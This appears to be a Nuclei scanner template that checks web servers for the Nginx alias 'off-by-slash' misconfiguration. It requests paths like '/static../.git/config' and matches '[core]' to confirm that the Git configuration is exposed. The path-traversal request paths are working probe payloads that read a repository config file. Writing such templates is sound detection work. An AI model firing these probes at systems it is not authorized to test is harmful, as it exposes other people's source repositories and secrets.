id: git-config-nginxoffbyslash info: name: Nginx off-by-slash exposes Git config author: organiccrap severity: medium description: Nginx off-by-slash vulnerability exposes Git configuration. tags: config,exposure reference: - https://twitter.com/Random_Robbie/status/1262676628167110656 - https://github.com/PortSwigger/nginx-alias-traversal/blob/master/off-by-slash.py requests: - method: GET path: - '{{BaseURL}}/static../.git/config' - '{{BaseURL}}/js../.git/config' - '{{BaseURL}}/images../.git/config' - '{{BaseURL}}/img../.git/config' - '{{BaseURL}}/css../.git/config' - '{{BaseURL}}/assets../.git/config' - '{{BaseURL}}/content../.git/config' - '{{BaseURL}}/events../.git/config' - '{{BaseURL}}/media../.git/config' - '{{BaseURL}}/lib../.git/config' stop-at-first-match: true matchers: - type: word words: - '[core]'